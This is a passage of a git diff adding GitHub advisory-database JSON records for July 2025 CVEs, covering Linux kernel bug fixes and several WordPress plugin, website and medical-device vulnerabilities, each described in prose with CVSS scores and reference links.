"https://plugins.trac.wordpress.org/browser/webinar-ignition/trunk/inc/class.WebinarignitionManager.php#L1040" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/webinar-ignition/trunk/inc/class.WebinarignitionManager.php#L53" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/52c19707-df18-4239-af46-12ea5ee86a4b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8gx9-2mgx-hm7j/GHSA-8gx9-2mgx-hm7j.json b/advisories/unreviewed/2025/07/GHSA-8gx9-2mgx-hm7j/GHSA-8gx9-2mgx-hm7j.json new file mode 100644 index 0000000000000..7444a3d8fd93d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8gx9-2mgx-hm7j/GHSA-8gx9-2mgx-hm7j.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gx9-2mgx-hm7j", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38409" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: Fix another leak in the submit error path\n\nput_unused_fd() doesn't free the installed file, if we've already done\nfd_install(). So we need to also free the sync_file.\n\nPatchwork: https://patchwork.freedesktop.org/patch/653583/", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38409" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/00b3401f692082ddf6342500d1be25560bba46d4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/30d3819b0b9173e31b84d662a592af8bad351427" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3f6ce8433a9035b0aa810e1f5b708e9dc1c367b0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c40ad1c04d306f7fde26337fdcf8a5979657d93f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f681c2aa8676a890eacc84044717ab0fd26e058f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8m46-hm8p-v8rj/GHSA-8m46-hm8p-v8rj.json b/advisories/unreviewed/2025/07/GHSA-8m46-hm8p-v8rj/GHSA-8m46-hm8p-v8rj.json new file mode 100644 index 0000000000000..48e20b462b046 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8m46-hm8p-v8rj/GHSA-8m46-hm8p-v8rj.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8m46-hm8p-v8rj", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38396" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: export anon_inode_make_secure_inode() and fix secretmem LSM bypass\n\nExport anon_inode_make_secure_inode() to allow KVM guest_memfd to create\nanonymous inodes with proper security context. This replaces the current\npattern of calling alloc_anon_inode() followed by\ninode_init_security_anon() for creating security context manually.\n\nThis change also fixes a security regression in secretmem where the\nS_PRIVATE flag was not cleared after alloc_anon_inode(), causing\nLSM/SELinux checks to be bypassed for secretmem file descriptors.\n\nAs guest_memfd currently resides in the KVM module, we need to export this\nsymbol for use outside the core kernel. In the future, guest_memfd might be\nmoved to core-mm, at which point the symbols no longer would have to be\nexported. When/if that happens is still unclear.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38396" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/66d29d757c968d2bee9124816da5d718eb352959" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6ca45ea48530332a4ba09595767bd26d3232743b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cbe4134ea4bc493239786220bd69cb8a13493190" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e3eed01347721cd7a8819568161c91d538fbf229" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f94c422157f3e43dd31990567b3e5d54b3e5b32b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8wmc-rr78-8pf9/GHSA-8wmc-rr78-8pf9.json b/advisories/unreviewed/2025/07/GHSA-8wmc-rr78-8pf9/GHSA-8wmc-rr78-8pf9.json new file mode 100644 index 0000000000000..f356f8b58de5b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8wmc-rr78-8pf9/GHSA-8wmc-rr78-8pf9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8wmc-rr78-8pf9", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-8009" + ], + "details": "The Security Ninja – WordPress Security Plugin & Firewall plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.242 via the 'get_file_source' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to extract sensitive data, including the contents of any file on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8009" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/security-ninja/trunk/modules/core-scanner/core-scanner.php#L186" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/security-ninja/trunk/modules/core-scanner/core-scanner.php#L33" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3333048" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/51ee45f8-9978-48ec-8f87-229dc82938a8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-36" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T08:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8x8p-vfxm-77vf/GHSA-8x8p-vfxm-77vf.json b/advisories/unreviewed/2025/07/GHSA-8x8p-vfxm-77vf/GHSA-8x8p-vfxm-77vf.json new file mode 100644 index 0000000000000..ae649fc37ad44 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8x8p-vfxm-77vf/GHSA-8x8p-vfxm-77vf.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8x8p-vfxm-77vf", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38355" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Process deferred GGTT node removals on device unwind\n\nWhile we are indirectly draining our dedicated workqueue ggtt->wq\nthat we use to complete asynchronous removal of some GGTT nodes,\nthis happends as part of the managed-drm unwinding (ggtt_fini_early),\nwhich could be later then manage-device unwinding, where we could\nalready unmap our MMIO/GMS mapping (mmio_fini).\n\nThis was recently observed during unsuccessful VF initialization:\n\n [ ] xe 0000:00:02.1: probe with driver xe failed with error -62\n [ ] xe 0000:00:02.1: DEVRES REL ffff88811e747340 __xe_bo_unpin_map_no_vm (16 bytes)\n [ ] xe 0000:00:02.1: DEVRES REL ffff88811e747540 __xe_bo_unpin_map_no_vm (16 bytes)\n [ ] xe 0000:00:02.1: DEVRES REL ffff88811e747240 __xe_bo_unpin_map_no_vm (16 bytes)\n [ ] xe 0000:00:02.1: DEVRES REL ffff88811e747040 tiles_fini (16 bytes)\n [ ] xe 0000:00:02.1: DEVRES REL ffff88811e746840 mmio_fini (16 bytes)\n [ ] xe 0000:00:02.1: DEVRES REL ffff88811e747f40 xe_bo_pinned_fini (16 bytes)\n [ ] xe 0000:00:02.1: DEVRES REL ffff88811e746b40 devm_drm_dev_init_release (16 bytes)\n [ ] xe 0000:00:02.1: [drm:drm_managed_release] drmres release begin\n [ ] xe 0000:00:02.1: [drm:drm_managed_release] REL ffff88810ef81640 __fini_relay (8 bytes)\n [ ] xe 0000:00:02.1: [drm:drm_managed_release] REL ffff88810ef80d40 guc_ct_fini (8 bytes)\n [ ] xe 0000:00:02.1: [drm:drm_managed_release] REL ffff88810ef80040 __drmm_mutex_release (8 bytes)\n [ ] xe 0000:00:02.1: [drm:drm_managed_release] REL ffff88810ef80140 ggtt_fini_early (8 bytes)\n\nand this was leading to:\n\n [ ] BUG: unable to handle page fault for address: ffffc900058162a0\n [ ] #PF: supervisor write access in kernel mode\n [ ] #PF: error_code(0x0002) - not-present page\n [ ] Oops: Oops: 0002 [#1] SMP NOPTI\n [ ] Tainted: [W]=WARN\n [ ] Workqueue: xe-ggtt-wq ggtt_node_remove_work_func [xe]\n [ ] RIP: 0010:xe_ggtt_set_pte+0x6d/0x350 [xe]\n [ ] Call Trace:\n [ ] \n [ ] xe_ggtt_clear+0xb0/0x270 [xe]\n [ ] ggtt_node_remove+0xbb/0x120 [xe]\n [ ] ggtt_node_remove_work_func+0x30/0x50 [xe]\n [ ] process_one_work+0x22b/0x6f0\n [ ] worker_thread+0x1e8/0x3d\n\nAdd managed-device action that will explicitly drain the workqueue\nwith all pending node removals prior to releasing MMIO/GSM mapping.\n\n(cherry picked from commit 89d2835c3680ab1938e22ad81b1c9f8c686bd391)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38355" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1b12f8dabbb8fd7d5a2611dd7bc5982ffbc2e5df" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5ab4eba9b26a93605b4f2f2b688d6ba818d7331d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/af2b588abe006bd55ddd358c4c3b87523349c475" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-926h-7qf4-c3hq/GHSA-926h-7qf4-c3hq.json b/advisories/unreviewed/2025/07/GHSA-926h-7qf4-c3hq/GHSA-926h-7qf4-c3hq.json new file mode 100644 index 0000000000000..c953df788c34a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-926h-7qf4-c3hq/GHSA-926h-7qf4-c3hq.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-926h-7qf4-c3hq", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38382" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix iteration of extrefs during log replay\n\nAt __inode_add_ref() when processing extrefs, if we jump into the next\nlabel we have an undefined value of victim_name.len, since we haven't\ninitialized it before we did the goto. This results in an invalid memory\naccess in the next iteration of the loop since victim_name.len was not\ninitialized to the length of the name of the current extref.\n\nFix this by initializing victim_name.len with the current extref's name\nlength.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38382" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2d11d274e2e1d7c79e2ca8461ce3ff3a95c11171" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/539969fc472886a1d63565459514d47e27fef461" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/54a7081ed168b72a8a2d6ef4ba3a1259705a2926" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7ac790dc2ba00499a8d671d4a24de4d4ad27e234" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aee57a0293dca675637e5504709f9f8fd8e871be" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-93f5-rwwh-v8p5/GHSA-93f5-rwwh-v8p5.json b/advisories/unreviewed/2025/07/GHSA-93f5-rwwh-v8p5/GHSA-93f5-rwwh-v8p5.json new file mode 100644 index 0000000000000..5fdb5b1f840c2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-93f5-rwwh-v8p5/GHSA-93f5-rwwh-v8p5.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-93f5-rwwh-v8p5", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38393" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Fix a race to wake on NFS_LAYOUT_DRAIN\n\nWe found a few different systems hung up in writeback waiting on the same\npage lock, and one task waiting on the NFS_LAYOUT_DRAIN bit in\npnfs_update_layout(), however the pnfs_layout_hdr's plh_outstanding count\nwas zero.\n\nIt seems most likely that this is another race between the waiter and waker\nsimilar to commit ed0172af5d6f (\"SUNRPC: Fix a race to wake a sync task\").\nFix it up by applying the advised barrier.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38393" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/08287df60bac5b008b6bcdb03053988335d3d282" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1f4da20080718f258e189a2c5f515385fa393da6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/864a54c1243ed3ca60baa4bc492dede1361f4c83" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8846fd02c98da8b79e6343a20e6071be6f372180" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8ca65fa71024a1767a59ffbc6a6e2278af84735e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c01776287414ca43412d1319d2877cbad65444ac" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e4b13885e7ef1e64e45268feef1e5f0707c47e72" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-99gr-q2p8-x55m/GHSA-99gr-q2p8-x55m.json b/advisories/unreviewed/2025/07/GHSA-99gr-q2p8-x55m/GHSA-99gr-q2p8-x55m.json new file mode 100644 index 0000000000000..e3ff6467a7ec0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-99gr-q2p8-x55m/GHSA-99gr-q2p8-x55m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99gr-q2p8-x55m", + "modified": "2025-07-25T15:30:42Z", + "published": "2025-07-25T15:30:41Z", + "aliases": [ + "CVE-2025-4394" + ], + "details": "Medtronic MyCareLink Patient Monitor uses an unencrypted filesystem on internal storage, which allows an attacker with physical access to read and modify files. \n\nThis issue affects MyCareLink Patient Monitor models 24950 and 24952: before June 25, 2025", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4394" + }, + { + "type": "WEB", + "url": "https://global.medtronic.com/xg-en/product-security/security-bulletins.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-312" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T07:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9mf6-h5qw-3r5p/GHSA-9mf6-h5qw-3r5p.json b/advisories/unreviewed/2025/07/GHSA-9mf6-h5qw-3r5p/GHSA-9mf6-h5qw-3r5p.json new file mode 100644 index 0000000000000..455d33d0e4664 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9mf6-h5qw-3r5p/GHSA-9mf6-h5qw-3r5p.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9mf6-h5qw-3r5p", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38354" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/gpu: Fix crash when throttling GPU immediately during boot\n\nThere is a small chance that the GPU is already hot during boot. In that\ncase, the call to of_devfreq_cooling_register() will immediately try to\napply devfreq cooling, as seen in the following crash:\n\n Unable to handle kernel paging request at virtual address 0000000000014110\n pc : a6xx_gpu_busy+0x1c/0x58 [msm]\n lr : msm_devfreq_get_dev_status+0xbc/0x140 [msm]\n Call trace:\n a6xx_gpu_busy+0x1c/0x58 [msm] (P)\n devfreq_simple_ondemand_func+0x3c/0x150\n devfreq_update_target+0x44/0xd8\n qos_max_notifier_call+0x30/0x84\n blocking_notifier_call_chain+0x6c/0xa0\n pm_qos_update_target+0xd0/0x110\n freq_qos_apply+0x3c/0x74\n apply_constraint+0x88/0x148\n __dev_pm_qos_update_request+0x7c/0xcc\n dev_pm_qos_update_request+0x38/0x5c\n devfreq_cooling_set_cur_state+0x98/0xf0\n __thermal_cdev_update+0x64/0xb4\n thermal_cdev_update+0x4c/0x58\n step_wise_manage+0x1f0/0x318\n __thermal_zone_device_update+0x278/0x424\n __thermal_cooling_device_register+0x2bc/0x308\n thermal_of_cooling_device_register+0x10/0x1c\n of_devfreq_cooling_register_power+0x240/0x2bc\n of_devfreq_cooling_register+0x14/0x20\n msm_devfreq_init+0xc4/0x1a0 [msm]\n msm_gpu_init+0x304/0x574 [msm]\n adreno_gpu_init+0x1c4/0x2e0 [msm]\n a6xx_gpu_init+0x5c8/0x9c8 [msm]\n adreno_bind+0x2a8/0x33c [msm]\n ...\n\nAt this point we haven't initialized the GMU at all yet, so we cannot read\nthe GMU registers inside a6xx_gpu_busy(). A similar issue was fixed before\nin commit 6694482a70e9 (\"drm/msm: Avoid unclocked GMU register access in\n6xx gpu_busy\"): msm_devfreq_init() does call devfreq_suspend_device(), but\nunlike msm_devfreq_suspend(), it doesn't set the df->suspended flag\naccordingly. This means the df->suspended flag does not match the actual\ndevfreq state after initialization and msm_devfreq_get_dev_status() will\nend up accessing GMU registers, causing the crash.\n\nFix this by setting df->suspended correctly during initialization.\n\nPatchwork: https://patchwork.freedesktop.org/patch/650772/", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38354" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1847ea44e3bdf7da8ff4158bc01b43a2e46394bd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7946a10f8da75abc494e4bb80243e153e93e459a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a6f673cc9488fd722c601fe020601dba14db21b2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ae2015b0dbc0eea7aaf022194371f451f784d994" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b71717735be48d7743a34897e9e44a0b53e30c0e" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9p64-9rxj-34pm/GHSA-9p64-9rxj-34pm.json b/advisories/unreviewed/2025/07/GHSA-9p64-9rxj-34pm/GHSA-9p64-9rxj-34pm.json new file mode 100644 index 0000000000000..4980db022e084 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9p64-9rxj-34pm/GHSA-9p64-9rxj-34pm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9p64-9rxj-34pm", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-45777" + ], + "details": "An issue in the OTP mechanism of Chavara Family Welfare Centre Chavara Matrimony Site v2.0 allows attackers to bypass authentication via supplying a crafted request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45777" + }, + { + "type": "WEB", + "url": "https://github.com/edwin-0990/CVE_ID/tree/main/CVE-2025-45777" + }, + { + "type": "WEB", + "url": "https://www.chavaramatrimony.com/register-free" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9qw8-xx45-2wp7/GHSA-9qw8-xx45-2wp7.json b/advisories/unreviewed/2025/07/GHSA-9qw8-xx45-2wp7/GHSA-9qw8-xx45-2wp7.json new file mode 100644 index 0000000000000..0244555c6d51e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9qw8-xx45-2wp7/GHSA-9qw8-xx45-2wp7.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9qw8-xx45-2wp7", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38416" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFC: nci: uart: Set tty->disc_data only in success path\n\nSetting tty->disc_data before opening the NCI device means we need to\nclean it up on error paths. This also opens some short window if device\nstarts sending data, even before NCIUARTSETDRIVER IOCTL succeeded\n(broken hardware?). Close the window by exposing tty->disc_data only on\nthe success path, when opening of the NCI device and try_module_get()\nsucceeds.\n\nThe code differs in error path in one aspect: tty->disc_data won't be\never assigned thus NULL-ified. This however should not be relevant\ndifference, because of \"tty->disc_data=NULL\" in nci_uart_tty_open().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38416" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/000bfbc6bc334a93fffca8f5aa9583e7b6356cb5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/55c3dbd8389636161090a2b2b6d2d709b9602e9c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a514fca2b8e95838a3ba600f31a18fa60b76d893" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a8acc7080ad55c5402a1b818b3008998247dda87" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ac6992f72bd8e22679c1e147ac214de6a7093c23" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/dc7722619a9c307e9938d735cf4a2210d3d48dcb" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e9799db771b2d574d5bf0dfb3177485e5f40d4d6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/fc27ab48904ceb7e4792f0c400f1ef175edf16fe" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c2fx-76wh-p9mq/GHSA-c2fx-76wh-p9mq.json b/advisories/unreviewed/2025/07/GHSA-c2fx-76wh-p9mq/GHSA-c2fx-76wh-p9mq.json new file mode 100644 index 0000000000000..a1baf8d32327b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c2fx-76wh-p9mq/GHSA-c2fx-76wh-p9mq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c2fx-76wh-p9mq", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-6539" + ], + "details": "The Voltax Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6539" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/voltax-video-player/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/babc2e50-27a5-413b-8611-0e9e9db33deb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c3c4-j5v2-q687/GHSA-c3c4-j5v2-q687.json b/advisories/unreviewed/2025/07/GHSA-c3c4-j5v2-q687/GHSA-c3c4-j5v2-q687.json new file mode 100644 index 0000000000000..50488ccec990c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c3c4-j5v2-q687/GHSA-c3c4-j5v2-q687.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3c4-j5v2-q687", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38411" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfs: Fix double put of request\n\nIf a netfs request finishes during the pause loop, it will have the ref\nthat belongs to the IN_PROGRESS flag removed at that point - however, if it\nthen goes to the final wait loop, that will *also* put the ref because it\nsees that the IN_PROGRESS flag is clear and incorrectly assumes that this\nhappened when it called the collector.\n\nIn fact, since IN_PROGRESS is clear, we shouldn't call the collector again\nsince it's done all the cleanup, such as calling ->ki_complete().\n\nFix this by making netfs_collect_in_app() just return, indicating that\nwe're done if IN_PROGRESS is removed.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38411" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9df7b5ebead649b00bf9a53a798e4bf83a1318fd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d18facba5a5795ad44b2a00a052e3db2fa77ab12" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c6g2-84gg-hc38/GHSA-c6g2-84gg-hc38.json b/advisories/unreviewed/2025/07/GHSA-c6g2-84gg-hc38/GHSA-c6g2-84gg-hc38.json new file mode 100644 index 0000000000000..8a0106ec9b0fb --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c6g2-84gg-hc38/GHSA-c6g2-84gg-hc38.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c6g2-84gg-hc38", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-7852" + ], + "details": "The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_new_customer' route in all versions up to, and including, 1.0.6. The plugin’s image‐upload handler calls move_uploaded_file() on client‐supplied files without restricting allowed extensions or MIME types, nor sanitizing the filename. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7852" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-customer-controller.php#L362" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3331165" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wpbookit/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb11092-4367-4f51-9dd7-22fbd655a03f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T07:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c7xc-fv22-2pq3/GHSA-c7xc-fv22-2pq3.json b/advisories/unreviewed/2025/07/GHSA-c7xc-fv22-2pq3/GHSA-c7xc-fv22-2pq3.json new file mode 100644 index 0000000000000..e93b7fe0a9df9 --- /dev/null +++ 